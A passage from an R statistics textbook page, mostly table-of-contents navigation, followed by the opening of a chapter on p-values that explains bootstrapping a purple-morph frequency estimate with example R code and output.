data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#types-of-test"><i class="fa fa-check"></i><b>30.3</b> Types of test</a> <ul> <li class="chapter" data-level="30.3.1" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#chi2-goodness-of-fit-test"><i class="fa fa-check"></i><b>30.3.1</b> <span class="math inline">\(\chi^{2}\)</span> goodness of fit test</a></li> <li class="chapter" data-level="30.3.2" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#chi2-contingency-table-test"><i class="fa fa-check"></i><b>30.3.2</b> <span class="math inline">\(\chi^{2}\)</span> contingency table test</a></li> <li class="chapter" data-level="30.3.3" data-path="working-with-frequencies.html"><a href="working-with-frequencies.html#the-assumptions-and-requirements-of-chi2-tests"><i class="fa fa-check"></i><b>30.3.3</b> The assumptions and requirements of <span class="math inline">\(\chi^{2}\)</span> tests</a></li> </ul></li> </ul></li> <li class="chapter" data-level="31" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html"><i class="fa fa-check"></i><b>31</b> Goodness of fit tests</a> <ul> <li class="chapter" data-level="31.1" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#when-do-we-use-a-chi-square-goodness-of-fit-test"><i class="fa fa-check"></i><b>31.1</b> When do we use a chi-square goodness of fit test?</a></li> <li class="chapter" data-level="31.2" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#how-does-the-chi-square-goodness-of-fit-test-work"><i class="fa fa-check"></i><b>31.2</b> How does the chi-square goodness of fit test work?</a> <ul> <li class="chapter" data-level="31.2.1" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#assumptions-of-the-chi-square-goodness-of-fit-test"><i class="fa fa-check"></i><b>31.2.1</b> Assumptions of the chi-square goodness of fit test</a></li> </ul></li> <li class="chapter" data-level="31.3" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#carrying-out-a-chi-square-goodness-of-fit-test-in-r"><i class="fa fa-check"></i><b>31.3</b> Carrying out a chi-square goodness of fit test in R</a> <ul> <li class="chapter" data-level="31.3.1" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#summarising-the-result-2"><i class="fa fa-check"></i><b>31.3.1</b> Summarising the result</a></li> <li class="chapter" data-level="31.3.2" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#a-bit-more-about-goodness-of-fit-tests-in-r"><i class="fa fa-check"></i><b>31.3.2</b> A bit more about goodness of fit tests in R</a></li> <li class="chapter" data-level="31.3.3" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#doing-it-the-long-way"><i class="fa fa-check"></i><b>31.3.3</b> Doing it the long way…</a></li> </ul></li> <li class="chapter" data-level="31.4" data-path="goodness-of-fit-tests.html"><a href="goodness-of-fit-tests.html#determining-appropriate-expected-values"><i class="fa fa-check"></i><b>31.4</b> Determining appropriate expected values</a></li> </ul></li> <li class="chapter" data-level="32" data-path="contingency-tables.html"><a href="contingency-tables.html"><i class="fa fa-check"></i><b>32</b> Contingency tables</a> <ul> <li class="chapter" data-level="32.1" data-path="contingency-tables.html"><a href="contingency-tables.html#when-do-we-use-a-chi-square-contingency-table-test"><i class="fa fa-check"></i><b>32.1</b> When do we use a chi-square contingency table test?</a></li> <li class="chapter" data-level="32.2" data-path="contingency-tables.html"><a href="contingency-tables.html#how-does-the-chi-square-contingency-table-test-work"><i class="fa fa-check"></i><b>32.2</b> How does the chi-square contingency table test work?</a> <ul> <li class="chapter" data-level="32.2.1" data-path="contingency-tables.html"><a href="contingency-tables.html#assumptions-of-the-chi-square-contingency-table-test"><i class="fa fa-check"></i><b>32.2.1</b> Assumptions of the chi-square contingency table test</a></li> </ul></li> <li class="chapter" data-level="32.3" data-path="contingency-tables.html"><a href="contingency-tables.html#carrying-out-a-chi-square-contingency-table-test-in-r"><i class="fa fa-check"></i><b>32.3</b> Carrying out a chi-square contingency table test in R</a> <ul> <li class="chapter" data-level="32.3.1" data-path="contingency-tables.html"><a href="contingency-tables.html#step-1.-getting-the-data-into-the-correct-format"><i class="fa fa-check"></i><b>32.3.1</b> Step 1. Getting the data into the correct format</a></li> <li class="chapter" data-level="32.3.2" data-path="contingency-tables.html"><a href="contingency-tables.html#step-2.-doing-the-test"><i class="fa fa-check"></i><b>32.3.2</b> Step 2. Doing the test</a></li> <li class="chapter" data-level="32.3.3" data-path="contingency-tables.html"><a href="contingency-tables.html#summarising-the-result-3"><i class="fa fa-check"></i><b>32.3.3</b> Summarising the result</a></li> </ul></li> <li class="chapter" data-level="32.4" data-path="contingency-tables.html"><a href="contingency-tables.html#working-with-larger-tables"><i class="fa fa-check"></i><b>32.4</b> Working with larger tables</a></li> </ul></li> <li class="chapter" data-level="33" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html"><i class="fa fa-check"></i><b>33</b> Non-parametric tests</a> <ul> <li class="chapter" data-level="33.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#what-is-non-par"><i class="fa fa-check"></i><b>33.1</b> What is a non-parametric test?</a></li> <li class="chapter" data-level="33.2" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#non-par-intro"><i class="fa fa-check"></i><b>33.2</b> How does a non-parametric test work?</a></li> <li class="chapter" data-level="33.3" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#non-parametric-equivalents"><i class="fa fa-check"></i><b>33.3</b> Non-parametric equivalents</a></li> <li class="chapter" data-level="33.4" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#wilcoxon-signed-rank-test"><i class="fa fa-check"></i><b>33.4</b> Wilcoxon signed-rank test</a> <ul> <li class="chapter" data-level="33.4.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#leaf-damage-plant-defences-and-feeding-by-winter-moth-larvae"><i class="fa fa-check"></i><b>33.4.1</b> Leaf damage, plant defences and feeding by winter moth larvae</a></li> </ul></li> <li class="chapter" data-level="33.5" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#mann-whitney"><i class="fa fa-check"></i><b>33.5</b> The Mann-Whitney <em>U</em>-test</a> <ul> <li class="chapter" data-level="33.5.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#ant-foraging"><i class="fa fa-check"></i><b>33.5.1</b> Ant foraging</a></li> </ul></li> <li class="chapter" data-level="33.6" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#the-kruskal-wallis-test"><i class="fa fa-check"></i><b>33.6</b> The Kruskal-Wallis test</a> <ul> <li class="chapter" data-level="33.6.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#learning-in-cuttlefish"><i class="fa fa-check"></i><b>33.6.1</b> Learning in cuttlefish</a></li> </ul></li> <li class="chapter" data-level="33.7" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#spearmans-rank-correlation"><i class="fa fa-check"></i><b>33.7</b> Spearman’s rank correlation</a> <ul> <li class="chapter" data-level="33.7.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#grouse-lekking"><i class="fa fa-check"></i><b>33.7.1</b> Grouse lekking</a></li> </ul></li> <li class="chapter" data-level="33.8" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#why-when"><i class="fa fa-check"></i><b>33.8</b> Why use non-parametric tests … and when?</a> <ul> <li class="chapter" data-level="33.8.1" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#what-are-the-advantages"><i class="fa fa-check"></i><b>33.8.1</b> What are the advantages?</a></li> <li class="chapter" data-level="33.8.2" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#what-are-the-disadvantages"><i class="fa fa-check"></i><b>33.8.2</b> What are the disadvantages?</a></li> <li class="chapter" data-level="33.8.3" data-path="non-parametric-tests.html"><a href="non-parametric-tests.html#parting-words"><i class="fa fa-check"></i><b>33.8.3</b> Parting words</a></li> </ul></li> </ul></li> <li class="appendix"><span><b>Supplementary Material</b></span></li> <li class="chapter" data-level="A" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html"><i class="fa fa-check"></i><b>A</b> Choosing models and tests</a> <ul> <li class="chapter" data-level="A.1" data-path="introduction-to-one-way-anova.html"><a href="introduction-to-one-way-anova.html#intro"><i class="fa fa-check"></i><b>A.1</b> Introduction</a> <ul> <li class="chapter" data-level="A.1.1" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#do-we-need-to-carry-out-a-statistical-analysis"><i class="fa fa-check"></i><b>A.1.1</b> Do we need to carry out a statistical analysis?</a></li> </ul></li> <li class="chapter" data-level="A.2" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#getting-started"><i class="fa fa-check"></i><b>A.2</b> Getting started…</a></li> <li class="chapter" data-level="A.3" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#a-key-to-choosing-statistical-models-and-tests"><i class="fa fa-check"></i><b>A.3</b> A key to choosing statistical models and tests</a></li> <li class="chapter" data-level="A.4" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#four-questions"><i class="fa fa-check"></i><b>A.4</b> Four main types of question</a></li> <li class="chapter" data-level="A.5" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#qu1"><i class="fa fa-check"></i><b>A.5</b> Question 1 –- Comparison of group means or medians</a> <ul> <li class="chapter" data-level="A.5.1" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#question-1-how-many-groups"><i class="fa fa-check"></i><b>A.5.1</b> Question 1 How many groups?</a></li> <li class="chapter" data-level="A.5.2" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#question-1-single-group"><i class="fa fa-check"></i><b>A.5.2</b> [Question 1] Single group</a></li> <li class="chapter" data-level="A.5.3" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#question-1-two-groups"><i class="fa fa-check"></i><b>A.5.3</b> [Question 1] Two groups</a></li> <li class="chapter" data-level="A.5.4" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#question-1-more-than-two-groups"><i class="fa fa-check"></i><b>A.5.4</b> [Question 1] More than two groups</a></li> </ul></li> <li class="chapter" data-level="A.6" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#qu2"><i class="fa fa-check"></i><b>A.6</b> Question 2 – Associations between two variables?</a> <ul> <li class="chapter" data-level="A.6.1" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#question-2-testing-y-as-a-function-of-x-or-an-association-between-x-and-y"><i class="fa fa-check"></i><b>A.6.1</b> [Question 2] Testing <span class="math inline">\(y\)</span> as a function of <span class="math inline">\(x\)</span>, or an association between <span class="math inline">\(x\)</span> and <span class="math inline">\(y\)</span>?</a></li> </ul></li> <li class="chapter" data-level="A.7" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#qu4"><i class="fa fa-check"></i><b>A.7</b> Question 3 -– Frequencies of categorical data</a></li> <li class="chapter" data-level="A.8" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#var-cat"><i class="fa fa-check"></i><b>A.8</b> Variables or categories?</a> <ul> <li class="chapter" data-level="A.8.1" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#anova-vs.-regression"><i class="fa fa-check"></i><b>A.8.1</b> ANOVA vs. regression</a></li> <li class="chapter" data-level="A.8.2" data-path="choosing-models-and-tests.html"><a href="choosing-models-and-tests.html#making-categories-out-of-continuous-measures"><i class="fa fa-check"></i><b>A.8.2</b> Making categories out of continuous measures</a></li> </ul></li> </ul></li> <li class="chapter" data-level="B" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html"><i class="fa fa-check"></i><b>B</b> Writing a scientific report</a> <ul> <li class="chapter" data-level="B.1" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#introduction-9"><i class="fa fa-check"></i><b>B.1</b> Introduction</a></li> <li class="chapter" data-level="B.2" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#the-structure-of-a-scientific-report"><i class="fa fa-check"></i><b>B.2</b> The structure of a scientific report</a> <ul> <li class="chapter" data-level="B.2.1" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#title"><i class="fa fa-check"></i><b>B.2.1</b> Title</a></li> <li class="chapter" data-level="B.2.2" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#abstract-or-summary"><i class="fa fa-check"></i><b>B.2.2</b> Abstract or Summary</a></li> <li class="chapter" data-level="B.2.3" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#introduction-10"><i class="fa fa-check"></i><b>B.2.3</b> Introduction</a></li> <li class="chapter" data-level="B.2.4" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#methods-1"><i class="fa fa-check"></i><b>B.2.4</b> Methods</a></li> <li class="chapter" data-level="B.2.5" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#results"><i class="fa fa-check"></i><b>B.2.5</b> Results</a></li> <li class="chapter" data-level="B.2.6" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#discussion"><i class="fa fa-check"></i><b>B.2.6</b> Discussion</a></li> <li class="chapter" data-level="B.2.7" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#acknowledgements"><i class="fa fa-check"></i><b>B.2.7</b> Acknowledgements</a></li> <li class="chapter" data-level="B.2.8" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#literature-cited-references"><i class="fa fa-check"></i><b>B.2.8</b> Literature cited / References</a></li> <li class="chapter" data-level="B.2.9" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#appendices"><i class="fa fa-check"></i><b>B.2.9</b> Appendices</a></li> </ul></li> <li class="chapter" data-level="B.3" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#presenting-species-names"><i class="fa fa-check"></i><b>B.3</b> Presenting species names</a> <ul> <li class="chapter" data-level="B.3.1" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#a-last-piece-of-advice"><i class="fa fa-check"></i><b>B.3.1</b> A last piece of advice…</a></li> </ul></li> <li class="chapter" data-level="B.4" data-path="writing-a-scientific-report.html"><a href="writing-a-scientific-report.html#further-reading-1"><i class="fa fa-check"></i><b>B.4</b> Further reading</a></li> </ul></li> <li class="chapter" data-level="C" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html"><i class="fa fa-check"></i><b>C</b> One-tailed vs. two-tailed tests</a> <ul> <li class="chapter" data-level="C.1" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html#introduction-11"><i class="fa fa-check"></i><b>C.1</b> Introduction</a></li> <li class="chapter" data-level="C.2" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html#an-example-of-a-one-tailed-hypothesis"><i class="fa fa-check"></i><b>C.2</b> An example of a one-tailed hypothesis</a></li> <li class="chapter" data-level="C.3" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html#so-how-do-we-perform-a-one-tailed-t-test"><i class="fa fa-check"></i><b>C.3</b> So how do we perform a one-tailed <em>t</em>-test?</a> <ul> <li class="chapter" data-level="C.3.1" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html#carrying-out-one-tailed-t-tests-in-r"><i class="fa fa-check"></i><b>C.3.1</b> Carrying out one-tailed <em>t</em>-tests in R</a></li> <li class="chapter" data-level="C.3.2" data-path="one-two-tailed-tests.html"><a href="one-two-tailed-tests.html#when-to-use-and-not-to-use-one-tailed-t-tests"><i class="fa fa-check"></i><b>C.3.2</b> When to use, and not to use, one-tailed <em>t</em>-tests</a></li> </ul></li> </ul></li> <li class="divider"></li> <li><a href="https://github.com/rstudio/bookdown" target="blank">Published with bookdown</a></li> </ul> </nav> </div> <div class="book-body"> <div class="body-inner"> <div class="book-header" role="navigation"> <h1> <i class="fa fa-circle-o-notch fa-spin"></i><a href="./">APS 240: Data Analysis and Statistics with R</a> </h1> </div> <div class="page-wrapper" tabindex="-1" role="main"> <div class="page-inner"> <section class="normal" id="section-"> <div id="statistical-significance-and-p-values" class="section level1" number="8"> <h1><span class="header-section-number">Chapter 8</span> Statistical significance and <em>p</em>-values</h1> <p>Frequentist statistics works by asking <em>what would have happened</em> if we were to repeat a data collection exercise many times, <em>assuming that the population remains the same</em> each time. This is the basic idea we used to generate sampling distributions in the last chapter. The details of this procedure depend on what kind of question we are asking, which varies from one situation to another.</p> <p>What is common to every frequentist technique is that we ultimately have to work out what some kind of sampling distribution looks like. Once we’ve done that we can evaluate how likely a particular result is. This naturally leads onto the most important ideas in frequentist statistics: <em>p</em>-values and statistical significance.</p> <div id="bootstrap" class="section level2" number="8.1"> <h2><span class="header-section-number">8.1</span> Estimating a sampling distribution</h2> <p>Let’s carry on with the plant polymorphism example. Our ultimate goal is to find out if the purple morph frequency is likely to be greater than 25% in the new study population. The suggestion above is that we will need to work out what the sampling distribution of the purple morph frequency estimate looks like to get to this point.</p> <p>At first glance this seems an impossible task in the real world because we would only have access to a single sample? The solution to this problem is surprisingly simple: use the one sample to approximate the population in some way, then work out what the sampling distribution of our estimate should look like by ‘taking samples’ from this approximation.</p> <p>We’ll unpack this idea a bit more before we try it out for real.</p> <div id="bootstrap-overview" class="section level3" number="8.1.1"> <h3><span class="header-section-number">8.1.1</span> Overview of bootstrapping</h3> <p>There are many ways to use a sample to approximate the population it came from. One of the simplest is to <em>pretend the sample is the true population</em>. All we then have to do to get at a sampling distribution is draw new samples from this pretend population. This may sound like ‘cheating’ but it turns out this is a perfectly valid way to construct approximate sampling distributions.</p> <p>We’ll try to get a sense of how this works using a physical analogy based on our plant morph example. Imagine that we have written down the colour of every sampled plant on a different piece of paper and then placed these bits of paper into in a hat. We then do the following:</p> <ol style="list-style-type: decimal"> <li>Pick a piece of paper at random, record its value (purple or green), put the paper back into the hat, and shake the hat about to mix up the bits of paper.</li> </ol> <p>(The shaking here is meant to ensure that each piece of paper has an equal chance of being picked.)</p> <ol start="2" style="list-style-type: decimal"> <li><p>Now pick another piece of paper (we might get the same one), record its value, put that one back into the hat, and shake everything up again.</p></li> <li><p>Repeat this process until we have a recorded new sample of colours that is the same size as the real sample. We have now have generated a ‘new sample’ from the original one.</p></li> </ol> <p>(This process is called ‘sampling with replacement.’ Each artificial sample is called a ‘bootstrapped sample.’)</p> <ol start="4" style="list-style-type: decimal"> <li><p>For each bootstrapped sample, calculate whatever quantity is of interest. In our example, this is the proportion of purple plants sampled.</p></li> <li><p>Repeat steps 1-4 until we have generated a large number of bootstrapped samples. About 10000 is sufficient for most problems.</p></li> </ol> <p>Although it seems like cheating this procedure really does approximate the sampling distribution of the purple plant frequency. It is called <strong>bootstrapping</strong> (or ‘the bootstrap’).</p> <p>The bootstrap is quite a sophisticated technique developed by statistician <a href="https://en.wikipedia.org/wiki/Bradley_Efron">Bradley Efron</a>. We’re not going to use it to solve real data analysis problems and there’s no need to learn how to do it. We’re introducing bootstrapping because it provides a reasonably intuitive way to understand how frequentist methodology works without having to get stuck into any difficult mathematics.</p> </div> <div id="doing-it-for-real" class="section level3" number="8.1.2"> <h3><span class="header-section-number">8.1.2</span> Doing it for real</h3> <p>No one carries out bootstrapping using bits of paper and hat. Generating 10000 bootstrapped samples via such a method would obviously take a very long time! Luckily, computers are very good at carrying out repetitive tasks quickly. We’re going to work through how to implement the bootstrap for our hypothetical example.</p> <div class="do-something"> <p> The best way to understand what follows is to actually work through the example. You are strongly encouraged to do this! </p> </div> <div id="set-up-and-read-the-data" class="section level4 unnumbered"> <h4>Set up and read the data</h4> <p>Assume we had sampled 250 individuals from the new plant population. A data set representing this situation is stored in the Comma Separated Value (CSV) file called ‘MORPH_DATA.CSV.’ Using the template project for the book examples, run through the following steps in your script:</p> <ul> <li><p>Read the data into an R data frame, assigning it the name <code>morph_data</code>.</p></li> <li><p>Use functions like <code>glimpse</code> / <code>str</code> to inspect <code>morph_data</code>.</p></li> <li><p>Use the <code>View</code> function to inspect the data with RStudio.</p></li> </ul> <p>Make sure you can answer the following questions:</p> <ul> <li><p>How many observations are in the data set?</p></li> <li><p>How many variables are in the data set? What are their names?</p></li> <li><p>What kind of variables are they?</p></li> <li><p>What values do the different variables take?</p></li> </ul> <p>The point of all this is to check that we understand our data. <strong>Always examine a dataset after reading it into R</strong>. If we don’t understand how our data is organised and what variables we are working with we are bound to make otherwise avoidable mistakes.</p> <p>What you should have found is that <code>morph_data</code> contains 250 rows and two columns/variables: <code>Colour</code> and <code>Weight</code>. <code>Colour</code> is a categorical variable and <code>Weight</code> is a numeric variable. The <code>Colour</code> variable contains the colour of each plant in the sample.</p> <p>What is that <code>Weight</code> variable all about? Actually… we don’t need this now—we’ll use it in the next chapter.</p> </div> <div id="running-the-bootstrap" class="section level4 unnumbered"> <h4>Running the bootstrap</h4> <p>Now that we understand the data we’re ready to implement bootstrapping. We are going to use a few R programming tricks that you may not have come across before. We’ll explain these as we go but there’s really no need to learn them. Focus on the ‘why’—the logic of what we’re doing—rather than the ‘how.’</p> <p>We want to construct an approximate sampling distribution for the frequency of purple morphs. That means the variable that matters is <code>Colour</code>. Rather than work with this inside the <code>morph_data</code> data frame, we’re going to pull it out using the <code>$</code> operator and assign it a name (<code>plant_morphs</code>):</p> <div class="sourceCode" id="cb9"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb9-1"><a href="statistical-significance-and-p-values.html#cb9-1" aria-hidden="true" tabindex="-1"></a><span class="co"># pull out the &#39;Colour&#39; variable</span></span> <span id="cb9-2"><a href="statistical-significance-and-p-values.html#cb9-2" aria-hidden="true" tabindex="-1"></a>plant_morphs <span class="ot">&lt;-</span> morph_data<span class="sc">$</span>Colour </span></code></pre></div> <p>Next, we’ll take a quick look at the values of <code>plant_morphs</code>:</p> <div class="sourceCode" id="cb10"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb10-1"><a href="statistical-significance-and-p-values.html#cb10-1" aria-hidden="true" tabindex="-1"></a><span class="co"># what is the set of values &#39;plant_morphs&#39; can take?</span></span> <span id="cb10-2"><a href="statistical-significance-and-p-values.html#cb10-2" aria-hidden="true" tabindex="-1"></a><span class="fu">unique</span>(plant_morphs)</span></code></pre></div> <pre><code>## [1] &quot;Green&quot; &quot;Purple&quot;</code></pre> <div class="sourceCode" id="cb12"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb12-1"><a href="statistical-significance-and-p-values.html#cb12-1" aria-hidden="true" tabindex="-1"></a><span class="co"># show the first 100 values</span></span> <span id="cb12-2"><a href="statistical-significance-and-p-values.html#cb12-2" aria-hidden="true" tabindex="-1"></a><span class="fu">head</span>(plant_morphs, <span class="dv">50</span>) </span></code></pre></div> <pre><code>## [1] &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; ## [9] &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; ## [17] &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; ## [25] &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; ## [33] &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; ## [41] &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; ## [49] &quot;Green&quot; &quot;Green&quot;</code></pre> <p>The last line printed out the first 50 values of <code>plant_morphs</code>. This shows that <code>plant_morphs</code> is a simple character vector with two categories describing the plant colour morph information.</p> <p>Next, we calculate and store the sample size (<code>samp_size</code>) and the point estimate of purple morph frequency (<code>mean_point_est</code>) from the sample:</p> <div class="sourceCode" id="cb14"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb14-1"><a href="statistical-significance-and-p-values.html#cb14-1" aria-hidden="true" tabindex="-1"></a><span class="co"># get the sample size form the length of &#39;plant_morphs&#39;</span></span> <span id="cb14-2"><a href="statistical-significance-and-p-values.html#cb14-2" aria-hidden="true" tabindex="-1"></a>samp_size <span class="ot">&lt;-</span> <span class="fu">length</span>(plant_morphs)</span> <span id="cb14-3"><a href="statistical-significance-and-p-values.html#cb14-3" aria-hidden="true" tabindex="-1"></a>samp_size</span></code></pre></div> <pre><code>## [1] 250</code></pre> <div class="sourceCode" id="cb16"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb16-1"><a href="statistical-significance-and-p-values.html#cb16-1" aria-hidden="true" tabindex="-1"></a><span class="co"># estimate the frequency of purple plants as a %</span></span> <span id="cb16-2"><a href="statistical-significance-and-p-values.html#cb16-2" aria-hidden="true" tabindex="-1"></a>mean_point_est <span class="ot">&lt;-</span> <span class="dv">100</span> <span class="sc">*</span> <span class="fu">sum</span>(plant_morphs <span class="sc">==</span> <span class="st">&quot;Purple&quot;</span>) <span class="sc">/</span> samp_size</span> <span id="cb16-3"><a href="statistical-significance-and-p-values.html#cb16-3" aria-hidden="true" tabindex="-1"></a>mean_point_est</span></code></pre></div> <pre><code>## [1] 30.8</code></pre> <p>The code in the point estimate calculation says “add up all the cases where <code>plant_morphs</code> is equal to ‘purple,’ divide that total by the sample size to get the proportion of purple plants in the sample, then multiply th eproprtion by 100 to turn it into a percentage.” So… we find that 30.8% of plants were purple among our sample of 250 plants.</p> <p>Now we’re ready to start bootstrapping. For convenience, we’ll store the number of bootstrapped samples we want in <code>n_samp</code> (i.e. 10000 in this case):</p> <div class="sourceCode" id="cb18"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb18-1"><a href="statistical-significance-and-p-values.html#cb18-1" aria-hidden="true" tabindex="-1"></a><span class="co"># number of bootstrapped samples we want</span></span> <span id="cb18-2"><a href="statistical-significance-and-p-values.html#cb18-2" aria-hidden="true" tabindex="-1"></a>n_samp <span class="ot">&lt;-</span> <span class="dv">10000</span></span></code></pre></div> <p>Next we need to work out how to resample the values in the <code>plant_morphs</code> vector. The <code>sample</code> function can do this for us:</p> <div class="sourceCode" id="cb19"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb19-1"><a href="statistical-significance-and-p-values.html#cb19-1" aria-hidden="true" tabindex="-1"></a><span class="co"># resample the plant colours</span></span> <span id="cb19-2"><a href="statistical-significance-and-p-values.html#cb19-2" aria-hidden="true" tabindex="-1"></a>samp <span class="ot">&lt;-</span> <span class="fu">sample</span>(plant_morphs, <span class="at">replace =</span> <span class="cn">TRUE</span>)</span> <span id="cb19-3"><a href="statistical-significance-and-p-values.html#cb19-3" aria-hidden="true" tabindex="-1"></a><span class="co"># show the first 50 values of the bootstrapped sample</span></span> <span id="cb19-4"><a href="statistical-significance-and-p-values.html#cb19-4" aria-hidden="true" tabindex="-1"></a><span class="fu">head</span>(samp, <span class="dv">50</span>) </span></code></pre></div> <pre><code>## [1] &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; ## [9] &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; ## [17] &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; ## [25] &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Purple&quot; ## [33] &quot;Green&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; ## [41] &quot;Purple&quot; &quot;Purple&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; &quot;Purple&quot; &quot;Green&quot; &quot;Green&quot; ## [49] &quot;Purple&quot; &quot;Green&quot;</code></pre> <p>The <code>replace = TRUE</code> ensures that we sample with replacement—this is the ‘putting the bits of paper back in the hat’ part of the process.</p> <p>The new <code>samp</code> variable now contains exactly one bootstrapped sample of th 250 plants in the real sample. We only need to extract one number from this—the frequency of purple morphs:</p> <div class="sourceCode" id="cb21"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb21-1"><a href="statistical-significance-and-p-values.html#cb21-1" aria-hidden="true" tabindex="-1"></a><span class="co"># calculate the purple morph frequencyin the bootstrapped sample</span></span> <span id="cb21-2"><a href="statistical-significance-and-p-values.html#cb21-2" aria-hidden="true" tabindex="-1"></a>first_bs_freq <span class="ot">&lt;-</span> <span class="dv">100</span> <span class="sc">*</span> <span class="fu">sum</span>(samp <span class="sc">==</span> <span class="st">&quot;Purple&quot;</span>) <span class="sc">/</span> samp_size</span></code></pre></div> <p>That’s one bootstrapped value of the purple morph frequency. Fine, but we need <span class="math inline">\(10^{4}\)</span> values. We don’t want to have to keep doing this over an over ‘by hand’—making <code>second_bs_freq</code>, <code>third_bs_freq</code>, and so on—because this would be very slow and boring to do.</p> <p>As we said earlier, computers are very good at carrying out repetitive tasks. The <code>replicate</code> function can replicate any R code many times and return the set of results. Here is some R code that repeats what we just did <code>n_samp</code> times, storing the resulting bootstrapped values of purple morph frequency in a numeric vector called <code>boot_out</code>:</p> <div class="sourceCode" id="cb22"><pre class="sourceCode r"><code class="sourceCode r"><span id="cb22-1"><a href="statistical-significance-and-p-values.html#cb22-1" aria-hidden="true" tabindex="-1"></a>boot_out <span 